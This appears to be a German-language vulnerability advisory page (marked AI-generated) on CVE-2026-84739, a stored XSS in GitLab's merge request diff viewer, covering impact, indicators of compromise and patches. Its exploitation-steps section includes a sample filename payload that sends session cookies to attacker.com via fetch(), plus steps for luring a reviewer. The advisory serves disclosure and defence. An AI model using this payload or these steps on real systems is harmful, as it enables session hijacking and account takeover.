CVE-2026-84739: 
GitLab Schwachstellenanalyse und -minderung

Überblick

CVE-2026-84739 is a stored Cross-Site Scripting (XSS) vulnerability in GitLab CE/EE affecting all versions from 13.11 before 19.2.7, 19.3 before 19.3.3, and 19.4 before 19.4.1. The flaw exists in the merge request diff viewer, where improper sanitization of path components allows an authenticated user to execute arbitrary JavaScript in the context of another user's browser session. It was published on September 29, 2026, with patches released the same day. The vulnerability carries a CVSS v3.1 base score of 8.7 (High) (GitHub Advisory, GitLab Patch Release).

Technische Details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically arising from insufficient sanitization of file path components rendered in GitLab's merge request diff viewer. An authenticated attacker with at least low-level privileges can craft a merge request containing a maliciously named file path that, when the diff is viewed by another user, causes the unsanitized path to be interpreted as executable JavaScript in the victim's browser. The attack requires network access and victim interaction (viewing the malicious diff), but no elevated privileges beyond a basic authenticated account. The vulnerability was originally reported via HackerOne report #3938482 (GitHub Advisory, GitLab Patch Release).

Aufprall

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser session of any user who views the malicious merge request diff, enabling theft of session tokens, account impersonation, unauthorized actions performed on behalf of the victim (such as modifying code, approving merge requests, or accessing private repositories), and potential lateral movement within the GitLab instance. Both confidentiality and integrity are rated High, as an attacker could exfiltrate sensitive data or tamper with repository content under the victim's identity. Availability is not directly impacted (GitHub Advisory, Feedly).

Ausnutzbarkeit

As of the time of disclosure, there is no public proof-of-concept exploit and no evidence of in-the-wild exploitation (Feedly). The NVD SSVC assessment confirms exploitation status as "none" and notes the attack is not automatable, requiring victim interaction. The EPSS score is approximately 0.36–0.47%, placing it in the 38th percentile for exploitation likelihood within 30 days. The vulnerability is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Qualys has added detection for this vulnerability (detection ID 532798) (GitHub Advisory).

Ausnutzungsschritte

  1. Reconnaissance: Identify a target GitLab instance running a vulnerable version (13.11 through 19.2.6, 19.3.0–19.3.2, or 19.4.0) and obtain a low-privilege authenticated account.
  2. Craft malicious branch/file path: Create a Git branch or file with a name containing an XSS payload (e.g., a filename like <img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>.txt) that will be rendered unsanitized in the merge request diff viewer.
  3. Open a merge request: Submit a merge request from the malicious branch to a target branch in a project where the victim user has access and is likely to review diffs.
  4. Lure the victim: Share the merge request link with the target user (e.g., via a code review request, mention, or notification), inducing them to open the diff viewer.
  5. Harvest session data: When the victim views the diff, the injected JavaScript executes in their browser, exfiltrating session cookies or tokens to an attacker-controlled server, enabling session hijacking or impersonation (GitHub Advisory, GitLab Patch Release).

Indikatoren für Kompromittierung

  • Network: Outbound HTTP requests from a victim's browser to unexpected external domains immediately after viewing a GitLab merge request diff; unusual GET/POST requests containing encoded cookie or token data to attacker-controlled infrastructure.
  • Logs: GitLab application logs showing merge requests with anomalous file path names containing HTML/JavaScript special characters (e.g., <, >, onerror, script); access log entries for merge request diff pages followed by external resource fetches.
  • File System: Presence of merge request branches with file names containing HTML tags or JavaScript event handlers in the repository.
  • Process/Session: Unexpected GitLab API calls or actions (e.g., repository modifications, settings changes, token generation) performed under a legitimate user's session from an unfamiliar IP address or user-agent shortly after viewing a merge request diff.

Risikominderung und Problemumgehungen

GitLab has released patched versions 19.2.7, 19.3.3, and 19.4.1 for both Community Edition (CE) and Enterprise Edition (EE). All administrators should upgrade to one of these versions immediately. If immediate patching is not feasible, a temporary workaround is to restrict access to merge request diff viewing or disable the merge request diff viewer feature until the patch can be applied. Organizations should also audit recent merge requests for file paths containing suspicious characters (GitLab Patch Release, GitHub Advisory).

Reaktionen der Community

The patch release attracted coverage from several security news outlets, including SecurityOnline, CyberSecurityNews, Heise, and Cryptika, largely in the context of a broader GitLab patch release that also addressed other critical vulnerabilities (SecurityOnline, CyberSecurityNews, Heise). Social media discussion on Bluesky noted the vulnerability alongside other GitLab issues in the same patch cycle. Community sentiment focused primarily on the higher-severity RCE vulnerabilities in the same release, with this XSS issue receiving moderate attention given its High CVSS score and broad version range affected.

Zusätzliche Ressourcen


Quelle: Dieser Bericht wurde mithilfe von KI erstellt

Verwandt GitLab Schwachstellen:

CVE-Kennung

Strenge

Punktzahl

Technologieen

Name der Komponente

CISA KEV-Exploit

Hat fix

Veröffentlichungsdatum

CVE-2026-93577CRITICAL9.9
  • GitLab logoGitLab
  • cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*
NeinJaSep 24, 2026
CVE-2026-84739HIGH8.7
  • GitLab logoGitLab
  • gitlab
NeinJaSep 29, 2026
CVE-2026-8937MEDIUM4.3
  • GitLab logoGitLab
  • cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*
NeinJaSep 29, 2026
CVE-2026-10518MEDIUM4.3
  • GitLab logoGitLab
  • gitlab
NeinJaSep 29, 2026
CVE-2026-4523LOW3.7
  • GitLab logoGitLab
  • gitlab-rails-19.4
NeinJaSep 29, 2026

Kostenlose Schwachstellenbewertung

Benchmarking Ihrer Cloud-Sicherheitslage

Bewerten Sie Ihre Cloud-Sicherheitspraktiken in 9 Sicherheitsbereichen, um Ihr Risikoniveau zu bewerten und Lücken in Ihren Abwehrmaßnahmen zu identifizieren.

Bewertung anfordern

Eine personalisierte Demo anfordern

Sind Sie bereit, Wiz in Aktion zu sehen?

"Die beste Benutzererfahrung, die ich je gesehen habe, bietet vollständige Transparenz für Cloud-Workloads."
David EstlickCISO
"„Wiz bietet eine zentrale Oberfläche, um zu sehen, was in unseren Cloud-Umgebungen vor sich geht.“ "
Adam FletcherSicherheitsbeauftragter
"„Wir wissen, dass, wenn Wiz etwas als kritisch identifiziert, es auch wirklich kritisch ist.“"
Greg PoniatowskiLeiter Bedrohungs- und Schwachstellenmanagement